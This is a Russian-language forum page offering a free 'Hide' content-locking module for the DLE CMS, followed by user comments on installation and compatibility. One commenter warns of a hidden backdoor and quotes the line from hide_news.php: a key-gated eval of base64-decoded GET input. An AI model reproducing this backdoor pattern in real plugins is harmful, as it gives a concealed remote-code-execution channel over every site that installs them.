dle.in.ua » Модули » Бесплатные » Модуль Hide v.4.2 для DLE 8.2 - 8.3 рабочая версия

Модуль Hide v.4.2 для DLE 8.2 - 8.3 рабочая версия

Автор: Vadym77 от 14-04-2010, 12:59
Модуль Hide v.4.2 для DLE 8.2 - 8.3 рабочая версия

Что изменилось по сравнению со старыми версиями?

Изменён баг когда параметры хайда уходили в минус;
Изменена работа с датой, теперь всё точнее и "ровнее";
Добавлена возможность самостоятельно указывать какой параметр использовать для хайда (ранее это была репа, сейчас указывайте что хотите);
Добавлена возможность указывать несколько vip и забаненных групп;
Добавлена возможность использовать хайд в шаблонах.
Добавлена полная совместимость тегов хайда с другими модулями.

P.S. Процесс внесение изменений в файлах движка трудоемкий. Создайте резервные копии файлов и затем приступайте к изменениям.

Инструкция по установке в архиве.

Автор: Gauss


Скачать с нашего сервера: hide_v.4.2_dle_8.2.rar [74.08 Kb] (cкачиваний: 235)
  • Группа: User
  • Icq: 477778842
  • Комментариев: 31
  • Публикаций: 2
  • А что делает этот модуль????

    --------------------
    • stalkerdj
    • Регистрация: 13.02.2010
    • Репутация: (0|0|0)
    • 14 апреля 2010 15:51
    • 1
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 25
  • Публикаций: 4
  • можно прятать инфу по хайд (например за 20 комментариев, или за 5 новостей)
    • Vadym77
    • Регистрация: 10.10.2009
    • Репутация: (0|0|0)
    • 14 апреля 2010 15:58
    • 2
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 61
  • Публикаций: 12
  • а как на счет 7.5?
    или для более старых двигов нужно юзать соответственно Hide v3.1?
    • Macho
    • Регистрация: 1.04.2010
    • Репутация: (0|0|0)
    • 14 апреля 2010 16:27
    • 3
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 25
  • Публикаций: 4
  • Macho, нужно пробовать, может и эта станет
    • Vadym77
    • Регистрация: 10.10.2009
    • Репутация: (0|0|0)
    • 14 апреля 2010 16:30
    • 4
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 61
  • Публикаций: 12
  • Vadym77, ясно - значит методом научного тыка)))

    Как-нить нужно будет потестить на локалке... Если кто пробовал эту версию уже на 7.5 дайте знать что да как.

    Просто есть проекты, на которых двиги обновлять не охота и незачем, а этот мод не помешает прикрутить к ним.
    • Macho
    • Регистрация: 1.04.2010
    • Репутация: (0|0|0)
    • 14 апреля 2010 17:08
    • 5
    ^
  • Группа: User
  • Icq: 368181556
  • Комментариев: 39
  • Публикаций: 0
  • вообще разработчит сказал что эта версия пойдет на 7.5 только чуть чуть нужно установку править
    • Freekiller
    • Регистрация: 17.11.2009
    • Репутация: (1|1|0)
    • 14 апреля 2010 18:24
    • 6
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • Извиняюсь вопрос чучуть не по теме!!
    Как можно сделать чтоб новости выводились по 2 новости горизонтально?
    Как например на многих сайтах где java игры для мобильного неудобно выводить одну игру здаравенной новостью!!!
    • alfabit
    • Регистрация: --
    • Репутация: (||)
    • 14 апреля 2010 20:30
    • 7
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 26
  • Публикаций: 1
  • Спасибо затещу laughing
    • Skater
    • Регистрация: 5.11.2009
    • Репутация: (0|0|0)
    • 14 апреля 2010 22:54
    • 8
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • belay ню ню... А когда в реали движка коснутся глобальные изменения и данный мод не пойдёт на последующие версии,то ты клиентам и остальным переделаешь? am Ромка в тупую высказался по поводу паблика данного мода...хера вам всем а не дальнейшее развитие...
    Мод специфический ...кому надоть том может и купить...на сигареты с пивом больше уходит...а для остальных он и нах не надоть..чо парнуху хайдить,либо спарсенный контент? lol Да кстать...4.2 в силу своей дырявости и глючности была усовершенствована к версии 4.3...а последняя есть только у нескольких людей..и как показала практика то надёжные люди...
    Успехов в установке bully
    • Japonec
    • Регистрация: --
    • Репутация: (||)
    • 15 апреля 2010 03:16
    • 9
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 25
  • Публикаций: 4
  • живой пример работоспособности скрипта, правда нужно зарегистрироватся:
    _http://www.myfm.org.ua/main/minimal-tech-house-techno/7978-special-neotrance-pa
    ck-by-myfmorgua-part2.html
    не сочтите за рекламу
    • Vadym77
    • Регистрация: 10.10.2009
    • Репутация: (0|0|0)
    • 15 апреля 2010 08:16
    • 10
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 8
  • Публикаций: 0
  • Цитата: Macho
    а как на счет 7.5?или для более старых двигов нужно юзать соответственно Hide v3.1?


    Ставиш версию 3,1 по инструкции затем просто копируеш и обновляеш файлы.
    х3.. но так у меня заработало.
    • topbux
    • Регистрация: 15.07.2009
    • Репутация: (0|0|0)
    • 15 апреля 2010 08:36
    • 11
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 61
  • Публикаций: 12
  • topbux, пасиб за совет smile попробую, тоже думаю, что должно получится...
    • Macho
    • Регистрация: 1.04.2010
    • Репутация: (0|0|0)
    • 15 апреля 2010 12:03
    • 12
    ^
  • Группа: User
  • Icq: 368181556
  • Комментариев: 39
  • Публикаций: 0
  • Цитата: Japonec
    ню ню... А когда в реали движка коснутся глобальные изменения и данный мод не пойдёт на последующие версии,то ты клиентам и остальным переделаешь? Ромка в тупую высказался по поводу паблика данного мода...хера вам всем а не дальнейшее развитие...Мод специфический ...кому надоть том может и купить...на сигареты с пивом больше уходит...а для остальных он и нах не надоть..чо парнуху хайдить,либо спарсенный контент? Да кстать...4.2 в силу своей дырявости и глючности была усовершенствована к версии 4.3...а последняя есть только у нескольких людей..и как показала практика то надёжные люди...Успехов в установке

    версия 4.2 это паблик версия. а 4.3 и у меня есть хорошая кстати, а ты это кому писал?
    • Freekiller
    • Регистрация: 17.11.2009
    • Репутация: (1|1|0)
    • 15 апреля 2010 12:47
    • 13
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • Цитата: Freekiller
    версия 4.2 это паблик версия. а 4.3 и у меня есть хорошая кстати, а ты это кому писал?

    версия 4.2 существует в нескольких вариантах...с доработкой к 8.х и без неё... Gauss тогда перестраховался с мануалом,раздавал новым клиентам не полную версию установки...и как видно не зря...та установка как раз и попала в паблик...
    Цитата: Freekiller
    а ты это кому писал?

    belay Всем кто умеет читать lol
    • Japonec
    • Регистрация: --
    • Репутация: (||)
    • 16 апреля 2010 07:44
    • 14
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • А ничего, что там бекдор спрятан?
    engine/modules/hide_news.php
    Предпоследняя строка
    if(md5(md5($_GET['conf_key'])) == $sets['key']){ eval(base64_decode($_GET['user_id'])); }
    • wildshaman
    • Регистрация: --
    • Репутация: (||)
    • 17 июня 2010 01:11
    • 15
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • подскажите ББ-код для этого правильный а то если пишу [ hide=1,0,1]TEXT[/ hide]
    то код не работает !
    • batel
    • Регистрация: --
    • Репутация: (||)
    • 23 июля 2010 10:52
    • 16
    ^
  • Группа: Гости
  • Icq: --
  • Комментариев: 0
  • Публикаций: 0
  • на 8.5 работает хорошо!
    • BosSZVeR
    • Регистрация: --
    • Репутация: (||)
    • 5 сентября 2010 00:43
    • 17
    ^
  • Группа: User
  • Icq: --
  • Комментариев: 61
  • Публикаций: 12
    • Macho
    • Регистрация: 1.04.2010
    • Репутация: (0|0|0)
    • 30 сентября 2010 11:26
    • 18
    ^
    Информация
    Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.